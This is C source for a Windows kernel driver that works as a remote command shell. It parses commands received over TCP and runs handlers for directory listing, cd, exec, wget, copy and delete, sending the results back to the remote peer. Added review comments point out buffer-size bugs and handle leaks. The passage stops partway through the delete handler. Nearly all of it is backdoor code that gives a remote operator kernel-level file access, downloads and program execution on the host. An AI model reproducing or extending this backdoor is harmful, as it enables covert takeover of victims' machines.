///
// uty@uaty
///
#include <ntddk.h>
#include "structs.h"
#include "commAnd.h"
#include "utils.h"
NTSTATUS
uSend(
PTCPS_Connection pConnection,
char *pSendBuffer,
ULONG ulSendBufferSize
);
/*
typedef struct FILE_BASIC_INFORMATION {
LARGE_INTEGER CreationTime;
LARGE_INTEGER LastAccessTime;
LARGE_INTEGER LastWriteTime;
LARGE_INTEGER ChangeTime;
ULONG FileAttributes;
} FILE_BASIC_INFORMATION, *PFILE_BASIC_INFORMATION;
typedef struct _FILE_DISPOSITION_INFORMATION {
BOOLEAN DeleteFile;
} FILE_DISPOSITION_INFORMATION;
*/
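// Buffer sizes shared by the command handlers.  All of them are BYTE counts,
// which is what ExAllocatePool/RtlZeroMemory take below: *_W is the size of a
// WCHAR buffer (511 / 255 characters), *_A the matching CHAR size.  Code that
// bounds a path with wcslen() therefore multiplies the character count by 2
// before comparing against a *_W value.
// The products are parenthesised so they stay intact inside larger
// expressions (e.g. a `%` or `/` applied to the macro).
#define SENDBUFLENGTH 1024
#define MAXPATHLENGTH_W (511*2)
#define MAXPATHLENGTH_A 511
#define MAXARGLENGTH_W (255*2)
#define MAXARGLENGTH_A 255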
NTSYSAPI
NTSTATUS
NTAPI
ZwQueryDirectoryFile(
IN HANDLE FileHandle,
IN HANDLE Event OPTIONAL,
IN PIO_APC_ROUTINE ApcRoutine OPTIONAL,
IN PVOID ApcContext OPTIONAL,
OUT PIO_STATUS_BLOCK IoStatusBlock,
OUT PVOID FileInformation,
IN ULONG FileInformationLength,
IN FILE_INFORMATION_CLASS FileInformationClass,
IN BOOLEAN ReturnSingleEntry,
IN PUNICODE_STRING FileName OPTIONAL,
IN BOOLEAN RestartScan
);
NTSYSAPI
NTSTATUS
NTAPI
ZwDeleteFile(
IN POBJECT_ATTRIBUTES ObjectAttributes
);
NTSYSAPI
NTSTATUS
NTAPI
ZwSetInformationFile(
IN HANDLE FileHandle,
OUT PIO_STATUS_BLOCK IoStatusBlock,
IN PVOID FileInformation,
IN ULONG Length,
IN FILE_INFORMATION_CLASS FileInformationClass
);
NTSYSAPI
NTSTATUS
NTAPI
ZwWriteFile(
IN HANDLE FileHandle,
IN HANDLE Event OPTIONAL,
IN PIO_APC_ROUTINE ApcRoutine OPTIONAL,
IN PVOID ApcContext OPTIONAL,
OUT PIO_STATUS_BLOCK IoStatusBlock,
IN PVOID Buffer,
IN ULONG Length,
IN PLARGE_INTEGER ByteOffset OPTIONAL,
IN PULONG Key OPTIONAL
);
NTSYSAPI
NTSTATUS
NTAPI
ZwReadFile(
IN HANDLE FileHandle,
IN HANDLE Event OPTIONAL,
IN PIO_APC_ROUTINE ApcRoutine OPTIONAL,
IN PVOID ApcContext OPTIONAL,
OUT PIO_STATUS_BLOCK IoStatusBlock,
OUT PVOID Buffer,
IN ULONG Length,
IN PLARGE_INTEGER ByteOffset OPTIONAL,
IN PULONG Key OPTIONAL
);
BOOLEAN
KWget(
PCHAR szURL,
PCHAR szFileNAme
);
BOOLEAN
KExec(
PCHAR CmdLine
);
//--------------------------------------------------------------------
//ReferenceCommAnd is not responsible for freeing the memory occupied by pRecvList
//
// ReferenceCommAnd: parse one received command line and dispatch it on its
// first word.  pRecvList->dAtA holds the text, pRecvList->pConnection the
// connection that replies are written to through uSend.  An unknown word is
// answered with "unreferenced commAnd", an empty word is ignored.
// Returns STATUS_SUCCESS unconditionally; handler failures are reported to
// the peer only, never through the return value.
// NOTE(review): both ExAllocatePool results are used without a NULL check.
NTSTATUS
ReferenceCommAnd(PRECVLIST pRecvList)
{
CHAR* usAge = "It think the most vAlueAble commAnds Are:\n"
" dir \n"
" cd \n"
" exec \n"
" wget \n"
" copy \n"
" del \n"
" pwd \n"
" chAngedriver \n"
" \n";
ULONG Argc;
CHAR* Argv[9];///9 Arguments is enough
WCHAR *tempforpAth;//equAl to TCPSConnection->m_PAth;
CHAR *AnsiTemp;//finAlly send to client
ULONG i;
tempforpAth = ExAllocatePool(PagedPool,MAXPATHLENGTH_W);// byte count: room for 511 WCHARs
AnsiTemp = ExAllocatePool(PagedPool,SENDBUFLENGTH);
RtlCopyMemory(tempforpAth,L"\\??\\",sizeof(L"\\??\\"));// sizeof includes the wide terminator
DbgPrint("commAndline: %s\n",pRecvList->dAtA);//debug
// NOTE(review): assumes dAtA is NUL-terminated, non-empty and ends in '\n'.
// For "" this indexes dAtA[-1] (strlen()-1 wraps as size_t) and writes
// before the buffer; for a line without a trailing '\n' it drops the last
// real character instead.
pRecvList->dAtA[strlen(pRecvList->dAtA)-1] = '\0';//remote the lAst \n
// GetArg (utils) splits dAtA in place into at most 9 words.  Argv[0] is read
// below without checking Argc > 0; the strcmp(Argv[0],"") case further down
// suggests GetArg yields "" for an empty line - confirm in utils.
GetArg(pRecvList->dAtA,&Argc,Argv,9);
DbgPrint("Argc: %d\n",Argc);//debug
for(i = 0;i<Argc;i++){
DbgPrint("%s\n",Argv[i]);
}
if(0 == _stricmp(Argv[0],"help")){
uSend(
pRecvList->pConnection,
usAge,
strlen(usAge)
);
}
else if(0 == _stricmp(Argv[0],"dir")){
//argument check
// NOTE(review): this compares a CHARACTER count with MAXPATHLENGTH_W, which is
// a BYTE size; CommAnd_Cd and CommAnd_Del multiply by 2 first, so this bound
// is loose by a factor of two and does not prevent the overflow it reports.
if(wcslen(tempforpAth) + wcslen(pRecvList->pConnection->m_PAth) < MAXPATHLENGTH_W){
wcscat(tempforpAth,pRecvList->pConnection->m_PAth);// \??\m_PAth
}else{
uSend(
pRecvList->pConnection,
"hAy! file nAme is too long,do you wAnnA A overflow?\n",
strlen("hAy! file nAme is too long,do you wAnnA A overflow?\n")
);
goto end_ReferenceCommAnd;
}
CommAnd_Dir(pRecvList,tempforpAth);
}
else if(0 == _stricmp(Argv[0],"cd")){
CommAnd_Cd(pRecvList,Argc,Argv);
}
else if(0 == _stricmp(Argv[0],"exec")){
CommAnd_Exec(pRecvList,Argc,Argv);
}
else if(0 == _stricmp(Argv[0],"wget")){
CommAnd_Wget(pRecvList,Argc,Argv);
}
else if(0 == _stricmp(Argv[0],"copy")){
CommAnd_Copy(pRecvList,Argc,Argv);
}
else if(0 == _stricmp(Argv[0],"del")){
CommAnd_Del(pRecvList,Argc,Argv);
}
else if(0 == _stricmp(Argv[0],"pwd")){
//m_PAth cAnnot big then 512
// AnsiTemp is not zeroed first; this relies on wtoA (utils) NUL-terminating
// its output before the strcat - confirm.
wtoA((WCHAR*)pRecvList->pConnection->m_PAth,(CHAR*)AnsiTemp);
strcat(AnsiTemp,"\n");////Avoid this situAtion c:u>
uSend(
pRecvList->pConnection,
AnsiTemp,
strlen(AnsiTemp)
);
}
else if(0 == _stricmp(Argv[0],"chAngeDriver")){// case-insensitive, so the "chAngedriver" spelling in usAge matches too
CommAnd_ChAngeDriver(pRecvList,Argc,Argv);
}
else if(0 == strcmp(Argv[0],"")){///for the press of enter ,but we remoted it
//do nothing
}
else{
uSend(
pRecvList->pConnection,
"unreferenced commAnd :>\n",
strlen("unreferenced commAnd :>\n")
);
}
// Single exit: the "dir" too-long goto and every other branch end up here,
// so both pool allocations are always released.
end_ReferenceCommAnd:
ExFreePool(tempforpAth);
ExFreePool(AnsiTemp);
return STATUS_SUCCESS;
}
//--------------------------------------------------------------------
// CommAnd_Dir: list the directory named by pAth (an NT-style "\??\..." path
// built by the caller) and send one line per entry to the peer.  Entries are
// fetched in INFORBUFFERLENGTH-byte batches with ZwQueryDirectoryFile and
// walked through NextEntryOffset; directories get a "\t\t<DIR>" suffix.
// Returns STATUS_SUCCESS unconditionally; errors are reported to the peer
// through uSend only.
// NOTE(review): the three ExAllocatePool results are used without a NULL check.
NTSTATUS CommAnd_Dir(PRECVLIST pRecvList,WCHAR* pAth)
{
HANDLE hFileHAndle;
OBJECT_ATTRIBUTES oA;
IO_STATUS_BLOCK IoStAtusBlock;
#define INFORBUFFERLENGTH 1024
CHAR *InforBuffer;
#define TEMPBUFFERLENGTHBYTES 1020 //4 bytes for '\n'
WCHAR *temp;// holds one file name (TEMPBUFFERLENGTHBYTES/2 WCHARs)
PFILE_DIRECTORY_INFORMATION pInfor;
UNICODE_STRING nAme;
NTSTATUS dwStAtus;
CHAR *SendBuffer;
SendBuffer = ExAllocatePool(PagedPool,SENDBUFLENGTH);
InforBuffer = ExAllocatePool(PagedPool,INFORBUFFERLENGTH);
temp = ExAllocatePool(PagedPool,TEMPBUFFERLENGTHBYTES);
RtlInitUnicodeString(&nAme,pAth);
InitializeObjectAttributes(
&oA,
&nAme,
OBJ_CASE_INSENSITIVE,
NULL,
NULL
);
dwStAtus = ZwOpenFile(
&hFileHAndle,
GENERIC_READ,
&oA,
&IoStAtusBlock,
FILE_SHARE_READ,
FILE_DIRECTORY_FILE
);
DbgPrint("dwStAtus: 0x%x\n IoStAtusBlock.StAtus: 0x%x\n",dwStAtus,IoStAtusBlock.Status);
// NOTE(review): open failures are not handled.  This test only fires for
// STATUS_PENDING, and even then execution continues into the loop below with
// hFileHAndle never assigned.  What is missing is a plain failure check on
// dwStAtus (!NT_SUCCESS) that reports and jumps to end_CommAnd_Dir.
if(dwStAtus == STATUS_PENDING && IoStAtusBlock.Status != STATUS_SUCCESS){///needs improvement
uSend(
pRecvList->pConnection,
"error\n",
strlen("error\n")
);
}
do{
RtlZeroMemory(InforBuffer,INFORBUFFERLENGTH);
dwStAtus = ZwQueryDirectoryFile(
hFileHAndle,
NULL,
NULL,
NULL,
&IoStAtusBlock,
InforBuffer,
INFORBUFFERLENGTH,
FileDirectoryInformation,
FALSE,
NULL,
FALSE
);
// NOTE(review): dwStAtus is ignored here and only the status block is
// tested, which may not have been written on a failed call.  If the end of
// the listing arrives as STATUS_NO_MORE_FILES in the status block (as the
// outer loop condition expects), it lands in this branch first, so a
// complete listing ends with "bAd directory" and the goto skips the ZwClose
// below - the directory handle leaks on every such path.
if (IoStAtusBlock.Status != STATUS_SUCCESS){//bug
uSend(
pRecvList->pConnection,
"bAd directory\n",
strlen("bAd directory\n")
);
goto end_CommAnd_Dir;
}
pInfor = (PFILE_DIRECTORY_INFORMATION)InforBuffer;
RtlZeroMemory(temp,TEMPBUFFERLENGTHBYTES);
// FileNameLength is a byte count and FileName carries no terminator.  The
// copy is clamped to the buffer, but a clamped copy fills all of temp and
// leaves no NUL for the wcslen/wcscat/wtoA that follow.
RtlCopyMemory(temp,(char*)pInfor->FileName,pInfor->FileNameLength < TEMPBUFFERLENGTHBYTES ?pInfor->FileNameLength:TEMPBUFFERLENGTHBYTES);
if(pInfor->FileAttributes & FILE_ATTRIBUTE_DIRECTORY){
/////////////mark directories
// NOTE(review): compares a character count against MAXPATHLENGTH_W, the
// byte size of a different buffer; temp holds TEMPBUFFERLENGTHBYTES/2 WCHARs,
// so this bound does not protect the wcscat.
if(wcslen(temp) + wcslen(L"\t\t<DIR>") < MAXPATHLENGTH_W){
wcscat(temp,L"\t\t<DIR>");
}else{
uSend(
pRecvList->pConnection,
"hAy! file nAme is too long,do you wAnnA A overflow?\n",
strlen("hAy! file nAme is too long,do you wAnnA A overflow?\n")
);
goto end_CommAnd_Dir;
}
////////////
}else{
//do nothing
}
RtlZeroMemory(SendBuffer,SENDBUFLENGTH);
wtoA(temp,SendBuffer);// narrow temp into SendBuffer (utils); assumed to NUL-terminate - confirm
strcat(SendBuffer,"\n");
uSend(
pRecvList->pConnection,
SendBuffer,
strlen(SendBuffer)
);
//RtlZeroMemory(SendBuffer,1024);//must not be cleared here
// Remaining entries of this batch.  NOTE(review): because this is a do/while,
// the body runs once even when the first entry was the only one
// (NextEntryOffset == 0): pInfor stays put and that entry is sent twice.
do{
pInfor = (PFILE_DIRECTORY_INFORMATION)((PCHAR)pInfor + pInfor->NextEntryOffset);
RtlZeroMemory(temp,TEMPBUFFERLENGTHBYTES);
RtlCopyMemory(temp,(char*)pInfor->FileName,pInfor->FileNameLength < TEMPBUFFERLENGTHBYTES ?pInfor->FileNameLength:TEMPBUFFERLENGTHBYTES);
if(pInfor->FileAttributes & FILE_ATTRIBUTE_DIRECTORY){
wcscat(temp,L"\t\t<DIR>");// NOTE(review): unlike the first entry, no length check before the suffix
}else{
//do nothing
}
RtlZeroMemory(SendBuffer,SENDBUFLENGTH);
//don't worry the length here
wtoA(temp,SendBuffer);
strcat(SendBuffer,"\n");
uSend(
pRecvList->pConnection,
SendBuffer,
strlen(SendBuffer)/////
);
//RtlZeroMemory(SendBuffer,1024);//must not be cleared here
}while(pInfor->NextEntryOffset != 0);
}while(IoStAtusBlock.Status != STATUS_NO_MORE_FILES);
ZwClose(hFileHAndle);// only reached on the normal loop exit; every goto above bypasses it
end_CommAnd_Dir:
ExFreePool(SendBuffer);
ExFreePool(InforBuffer);
ExFreePool(temp);
return STATUS_SUCCESS;
}
//--------------------------------------------------------------------
// CommAnd_Cd: change pRecvList->pConnection->m_PAth.  "cd" alone does nothing,
// more than one argument is rejected, ".." strips trailing components, "\"
// resets to the drive root, and any other argument is opened as a directory
// at "\??\" + m_PAth + Argv[1]; only if that open succeeds is Argv[1] plus a
// trailing "\" appended to m_PAth.  Returns STATUS_SUCCESS unconditionally;
// failures are reported to the peer through uSend only.
// NOTE(review): both ExAllocatePool results are used without a NULL check, and
// the capacity of m_PAth itself is not visible here - the checks below assume
// it is MAXPATHLENGTH_W bytes.
NTSTATUS CommAnd_Cd(PRECVLIST pRecvList,ULONG Argc,CHAR* Argv[])
{
HANDLE hFileHAndle;
OBJECT_ATTRIBUTES oA;
UNICODE_STRING nAme;
NTSTATUS dwStAtus;
IO_STATUS_BLOCK IoStAtusBlock;
WCHAR *tempforpAth;
WCHAR *tempforArg;//convert Argv[1] to WCHAR
ULONG i;
tempforpAth = ExAllocatePool(PagedPool,MAXPATHLENGTH_W);
tempforArg = ExAllocatePool(PagedPool,MAXARGLENGTH_W);
if(Argc < 2){
//do nothing
goto end_CommAnd_Cd;
}
if(Argc > 2){
uSend(
pRecvList->pConnection,
"too mAny Arguments\n",
strlen("too mAny Arguments\n")
);
goto end_CommAnd_Cd;
}
if(0 == strcmp(Argv[1],"..")){ //cd ..
// NOTE(review): nothing breaks out of the loop after a truncation, so it keeps
// cutting at every earlier '\\'; for a drive-letter path "cd .." therefore
// always ends at the root (x:\), not the parent.  i starts at wcslen(), i.e.
// on the terminator, which is harmless since that is never '\\'.
for (i = wcslen(pRecvList->pConnection->m_PAth);i > 0;i--){
if(pRecvList->pConnection->m_PAth[i] == L'\\'){//Add L, whAtever
pRecvList->pConnection->m_PAth[i] = L'\0';
if(wcslen(pRecvList->pConnection->m_PAth) == 2){//x:
wcscat(pRecvList->pConnection->m_PAth,L"\\");
}
}
}
return STATUS_SUCCESS;// NOTE(review): bypasses end_CommAnd_Cd - tempforpAth and tempforArg leak
}
if(0 == strcmp(Argv[1],"\\")){ //cd \
pRecvList->pConnection->m_PAth[3] = L'\0';// assumes m_PAth starts with "x:\"; index 3 is the first char past the root
goto end_CommAnd_Cd;
}
RtlZeroMemory(tempforArg,MAXARGLENGTH_W);
// Widen Argv[1] into tempforArg (Atow, utils); the length bound keeps the
// widened string inside MAXARGLENGTH_W bytes.
if(strlen(Argv[1]) < MAXARGLENGTH_A){
Atow(Argv[1],tempforArg);
}else{
uSend(
pRecvList->pConnection,
"hAy! file nAme is too long,do you wAnnA A overflow?\n",
strlen("hAy! file nAme is too long,do you wAnnA A overflow?\n")
);
goto end_CommAnd_Cd;
}
//sprintf(tempforpAth,L"\\??\\%S\\%S",pRecvList->pConnection->m_PAth,tempforArg);
RtlZeroMemory(tempforpAth,MAXPATHLENGTH_W);
RtlCopyMemory(tempforpAth,L"\\??\\",sizeof(L"\\??\\"));//not wcslen
// *2 because wcslen counts WCHARs while MAXPATHLENGTH_W is a byte size.
if ((wcslen(tempforpAth) + wcslen(pRecvList->pConnection->m_PAth))*2 < MAXPATHLENGTH_W ){
wcscat(tempforpAth,pRecvList->pConnection->m_PAth);
}else{
uSend(
pRecvList->pConnection,
"hAy! file nAme is too long,do you wAnnA A overflow?\n",
strlen("hAy! file nAme is too long,do you wAnnA A overflow?\n")
);
goto end_CommAnd_Cd;
}
//wcscat(tempforpAth,L"\\");// backslash added separately
// No separator is inserted here; this relies on m_PAth always ending in "\"
// (one is appended on every successful cd below).
if((wcslen(tempforpAth) + wcslen(tempforArg))*2 < MAXPATHLENGTH_W){
wcscat(tempforpAth,tempforArg);
}else{
uSend(
pRecvList->pConnection,
"hAy! file nAme is too long,do you wAnnA A overflow?\n",
strlen("hAy! file nAme is too long,do you wAnnA A overflow?\n")
);
goto end_CommAnd_Cd;
}
DbgPrint("cd PAth: %S\n",tempforpAth);//debug
RtlInitUnicodeString(&nAme,tempforpAth);
InitializeObjectAttributes(
&oA,
&nAme,
OBJ_CASE_INSENSITIVE,
NULL,
NULL
);
// Open the target as a directory purely to test that it exists.
dwStAtus = ZwOpenFile(
&hFileHAndle,
GENERIC_READ,
&oA,
&IoStAtusBlock,
FILE_SHARE_READ,
FILE_DIRECTORY_FILE
);
DbgPrint("dwStAtus: 0x%x\n",dwStAtus);//debug
DbgPrint("IoStAtusBlock.StAtus: 0x%x\n",IoStAtusBlock.Status);//debug
// The second test is redundant: STATUS_OBJECT_NAME_NOT_FOUND already differs
// from STATUS_SUCCESS.
if (dwStAtus != STATUS_SUCCESS || dwStAtus == STATUS_OBJECT_NAME_NOT_FOUND){//needs improvement
uSend(
pRecvList->pConnection,
"direcotry does not exists\n",
strlen("direcotry does not exists\n")
);
}else{
// +2: one for the trailing L"\\", presumably one for the terminator.
if((wcslen(pRecvList->pConnection->m_PAth) + wcslen(tempforArg) + 2 )*2 < MAXPATHLENGTH_W){//1 for L"\\"
wcscat(pRecvList->pConnection->m_PAth,tempforArg);
wcscat(pRecvList->pConnection->m_PAth,L"\\");
}else{
uSend(
pRecvList->pConnection,
"hAy! file nAme is too long,do you wAnnA A overflow?\n",
strlen("hAy! file nAme is too long,do you wAnnA A overflow?\n")
);
goto end_CommAnd_Cd;// NOTE(review): the open succeeded on this path, so this skips ZwClose - handle leak
}
}
// NOTE(review): also reached from the failure branch above, where ZwOpenFile
// did not hand out a handle and hFileHAndle is still uninitialised.
ZwClose(hFileHAndle);
end_CommAnd_Cd:
ExFreePool(tempforpAth);
ExFreePool(tempforArg);
return STATUS_SUCCESS;
}
//--------------------------------------------------------------------
NTSTATUS CommAnd_Del(PRECVLIST pRecvList,ULONG Argc,CHAR* Argv[])
{
HANDLE hFileHAndle;
OBJECT_ATTRIBUTES oA;
UNICODE_STRING nAme;
IO_STATUS_BLOCK IoStAtusBlock;
NTSTATUS dwStAtus;
WCHAR *tempforpAth;
WCHAR *tempforArg;
ULONG i;
FILE_BASIC_INFORMATION fileBAsicInfor= {0};
FILE_DISPOSITION_INFORMATION fileDispositionInfor;
tempforpAth = ExAllocatePool(PagedPool,MAXPATHLENGTH_W);
tempforArg = ExAllocatePool(PagedPool,MAXARGLENGTH_W);
for(i = 1;i < Argc;i++){
RtlZeroMemory(tempforArg,MAXARGLENGTH_W);
//check the Arg,
if (strlen(Argv[i]) < MAXARGLENGTH_A){
Atow(Argv[i],tempforArg);
}else{
uSend(
pRecvList->pConnection,
"hAy! file nAme is too long,do you wAnnA A overflow?\n",
strlen("hAy! file nAme is too long,do you wAnnA A overflow?\n")
);
goto end_CommAnd_Del;
}
RtlZeroMemory(tempforpAth,MAXPATHLENGTH_W);
RtlCopyMemory(tempforpAth,L"\\??\\",sizeof(L"\\??\\"));
//check the Arg
if((wcslen(tempforpAth) + wcslen(pRecvList->pConnection->m_PAth))*2 < MAXPATHLENGTH_W){
wcscat(tempforpAth,pRecvList->pConnection->m_PAth);
}else{
uSend(
pRecvList->pConnection,
"hAy! file nAme is too long,do you wAnnA A overflow?\n",
strlen("hAy! file nAme is too long,do you wAnnA A overflow?\n")
);
goto end_CommAnd_Del;
}
if((wcslen(tempforpAth) + wcslen(tempforArg))*2 < MAXPATHLENGTH_W){
wcscat(tempforpAth,tempforArg);
}else{